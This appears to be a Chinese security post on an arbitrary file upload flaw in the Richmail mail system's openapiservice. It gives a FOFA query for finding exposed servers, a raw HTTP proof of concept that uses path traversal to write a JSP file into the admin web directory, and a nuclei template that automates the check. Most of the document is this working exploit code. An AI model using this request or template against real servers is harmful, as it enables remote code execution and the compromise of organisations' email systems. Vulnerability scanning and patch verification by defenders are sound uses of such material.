免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
Richmail 邮件系统中的 openapiservice 存在任意文件上传漏洞。攻击者可以利用此漏洞上传任意文件,可能进一步导致远程代码执行。
影响版本:
Richmail 邮件系统
FOFA:
"Richmail 企业邮箱"POC:
POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="imageX"
0
------WebKitFormBoundary
Content-Disposition: form-data; name="imageY"
0
------WebKitFormBoundary
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundary
Content-Disposition: form-data; name="filename"; filename="../../../../../web/webmailsvr/admin/12.jsp"
Content-Type: text/plain
<% out.println("Vulnerable!"); %>
------WebKitFormBoundary--访问上传文件的路径,如果存在Vulnerable!则存在漏洞
nuclei模板
id: letter-image-upload-rce
info:
name: Letter Image Upload RCE
author: ProjectDiscoveryAI
severity: high
description: |
This template checks for a vulnerability in the letterImageUpload functionality which allows arbitrary file upload leading to remote code execution.
tags: rce,file-upload
http:
- raw:
- |
POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="imageX"
0
------WebKitFormBoundary
Content-Disposition: form-data; name="imageY"
0
------WebKitFormBoundary
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundary
Content-Disposition: form-data; name="filename"; filename="../../../../../web/webmailsvr/admin/12.jsp"
Content-Type: text/plain
<% out.println("Vulnerable!"); %>
------WebKitFormBoundary--
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "Vulnerable!"
没有回复内容